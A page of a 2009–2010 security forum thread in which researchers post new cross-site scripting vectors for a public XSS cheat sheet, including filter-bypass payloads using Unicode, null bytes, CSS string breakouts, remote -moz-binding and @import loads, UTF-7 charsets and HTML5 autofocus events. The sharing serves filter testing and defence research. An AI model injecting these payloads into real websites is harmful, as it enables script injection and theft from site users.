Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: New Version of the XSS Cheat Sheet
Posted by: nEUrOO
Date: August 15, 2009 04:28PM

@thornmaker yeah, add "Thornmaker, CISSP" in your signature :} -- be proud! it's okay you know...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Gareth Heyes
Date: August 15, 2009 05:28PM

I think you should have a CISSP pride day

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: nEUrOO
Date: August 15, 2009 05:52PM

i don't want to see thornmaker dancing almost naked in the street with his CISSP certif folded in fig leaf... O_o

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: sirdarckcat
Date: August 15, 2009 11:07PM

oh god..

dross and jeremiah are also CISSP iirc heh

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: sirdarckcat
Date: August 16, 2009 09:54PM

Oh, this is not very well known, so...

<&#383;cript>

changes to <SCRIPT> when:

"\u017fcript".toUpperCase()

unicode for the win!

credit goes to chris weber that guy rocks..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 08/16/2009 09:55PM by sirdarckcat.

Options: ReplyQuote
n
Posted by: Anonymous User
Date: September 07, 2009 05:20AM

o



Edited 1 time(s). Last edit at 10/16/2009 03:25AM by philip_clarke.

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: LeverOne
Date: March 04, 2010 01:41AM

Continue!

1.
Quote
ha.ckers.org/xss2.html
<P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">

The power of this vector is still not fully identified and it generates questions. This should be replaced by
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="alert('XSS')">
or better
<P STYLE="behavior:url('#default#time2')" onBegin="alert('XSS')">
.

I already wrote about this.

2.
Quote
ha.ckers.org/xss2.html

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>@im\port'ht\tp://ha.c\kers.org/xss-retest.css';</STYLE>

Need to add:

<STYLE>a{background:url('s1' 's2)}@import javascript:alert(1);');}</STYLE>
// IE 6


or better

<STYLE>a{background:url('s1' 's2)}@import url(http://ha.ckers.org/xss.css);');}</STYLE>
// IE 6-8 (breaking out of css-string + rules after something)


to your taste...

3.
Quote
ha.ckers.org/xss2.html
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

It should be replaced:

<STYLE>BODY{property:"
invalid;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);"}</STYLE>
//FF 3.6 + breaking out of css-string


or better

<body style="property:'&#10invalid;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);'">


4.
Quote
ha.ckers.org/xss2.html
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
// IE (in tag)

perl -e 'print "<IMG SRC=\"\" o\0nerror=alert(\"XSS\")>";' > out
// IE (in attribute)

Need to add:

perl -e 'print "<IMG\0zzz SRC=\"\" onerror\0zzz=alert(\"XSS\")>";' > out
// GC 4 & Safari 4.0.4 (right side (after \0) in the tagname and attribute is ignored, but left side is valid)


And the logical conclusion:

perl -e 'print "<IMG STYLE=xss:expr/\0*XSS*\0/ession(alert(\"XSS\"))>";' > out
// IE (in parameter, bypass filtering comments). This comment is also valid in GC & Safari, if stylesheet into "<style>".



@all, the show must go on!!!


P.S.
Quote
rsnake
Posted by: rsnake
Date: August 10, 2009

Quote
ha.ckers.org/xss2.html
Check back in a week or two!

:D:D:D


upd1: @Gareth, nice! haha :)) Yep, <imitation>I'll do my own</imitation>


LeverOne

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/04/2010 03:18AM by LeverOne.

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Gareth Heyes
Date: March 04, 2010 02:50AM

@LeverOne

<sarcasm>I'm sorry your vectors contain a single quote this is already on the cheatsheet, we don't include vectors that can be made using elements of previous vectors.......</sarcasm>


<praise>
Nice vectors! I like your CSS break out
</praise>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/04/2010 02:51AM by Gareth Heyes.

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Kyo
Date: March 15, 2010 04:20AM

Am I late to the party?

whitelist bypassing;


<img src= alt=" onerror=alert(1)//">



Edited 1 time(s). Last edit at 03/15/2010 04:21AM by Kyo.

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Gareth Heyes
Date: March 15, 2010 04:48AM

@Kyo

Nice idea that actually, but any good whitelist will either drop the src or rewrite it. Still nice vector though

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Kyo
Date: March 15, 2010 06:31AM

It's helped me at least once :)

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: March 17, 2010 03:42PM

What about this one? Works on IE8 and IE9

<style>@import'vb\script:alert(1)</style>



Edited 1 time(s). Last edit at 03/17/2010 03:43PM by .mario.

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: April 22, 2010 04:16PM

Despite the assumption the XSS cheat sheet has other purposes than being an XSS cheat sheet - here's some new meat (all Gecko based user agents):

<meta charset="x-imap4-modified-utf7"&&>&&<script&&>alert(1)&&;&&<&&/script&&>

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Gareth Heyes
Date: April 22, 2010 05:49PM

That's pretty cool

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: April 26, 2010 02:09PM

Okay - it's on!

http://code.google.com/p/html5security/

http://code.google.com/p/html5security/source/browse/#svn/trunk

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Gareth Heyes
Date: April 26, 2010 03:20PM

@mario

Sweeeeeeet

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Skyphire
Date: April 27, 2010 08:04AM

@mario

Why onfocus & onblur? or the other list of inline events and style for that matter? they are already known right?

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: April 27, 2010 08:20AM

@Skyphire: onfocus and onblur usually require user interaction - with HTML5 autofocus attributes the don't anymore.

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Skyphire
Date: April 27, 2010 05:56PM

Ohmy... "Autofocus" *sigh* there we go. Didn't know about that, cool actually. it brings some more logic to HTML. I wonder if we can bubble the focus to another element this way, then we might have some cool file stealer going on. ;)

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: April 30, 2010 04:32PM

So - after adding almost 30 vectors it's time to show where and how the action happens (don't bookmark - the domain will change and I will keep u posted)

http://heideri.ch/jso/

No SEO, no jizz nor goo - just an attempt to create a place where this madness is being collected to be freely available for whatever you need it. Scanners, your own internal cheat sheet, ... up to you. You got a contribution? Ping me or one of the other project owners:

http://code.google.com/p/html5security/

More vectors coming tomorrow.

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Skyphire
Date: May 21, 2010 10:56AM

New HTML5 event handler:
oninput=""

Browser test page: http://jsbin.com/efalu/7

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: May 21, 2010 05:03PM

http://heideri.ch/jso/#86 Nice - found out during testing that Safari does autofocus too meanwhile - tsts

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Skyphire
Date: May 22, 2010 07:20AM

onhashchange="event"

hehe.


Provided code by whatwg:


<!DOCTYPE HTML>
<html>
 <head>
  <title>onhashchange</title>
 </head>
 <body onload="update()" onhashchange="update()">
  <h1>onhashchange</h1>

  <p><a href="#a">AAAA</a> <a href="#b">BBBB</a></p>

  <p id=message>...</p>

  <script>

   function update() {
     if (location.hash) {
       var msg = location.hash.substr(1);
       document.getElementById('message').firstChild.data = msg;
     }
   }

  </script>

 </body>
</html>



Edited 1 time(s). Last edit at 05/22/2010 07:21AM by Skyphire.

Options: ReplyQuote
Re: New Version of the XSS Cheat Sheet
Posted by: Skyphire
Date: May 22, 2010 07:44AM

Haven't checked these, but im sure there are a couple new ones.

    onafterprint
    onbeforeprint
    onbeforeunload
    onemptied
    ondurationchange
    onhashchange
    onmessage
    onoffline
    ononline
    onpagehide
    onplaying
    onpageshow
    oncanplay
    onpopstate
    onratechange
    onredo
    onresize
    onreset
    onstorage
    onseeking
    onsuspend
    onstalled
    onundo
    onunload
    onwebkitanimationiteration
    onwebkittransitionend



Edited 1 time(s). Last edit at 05/22/2010 07:48AM by Skyphire.

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.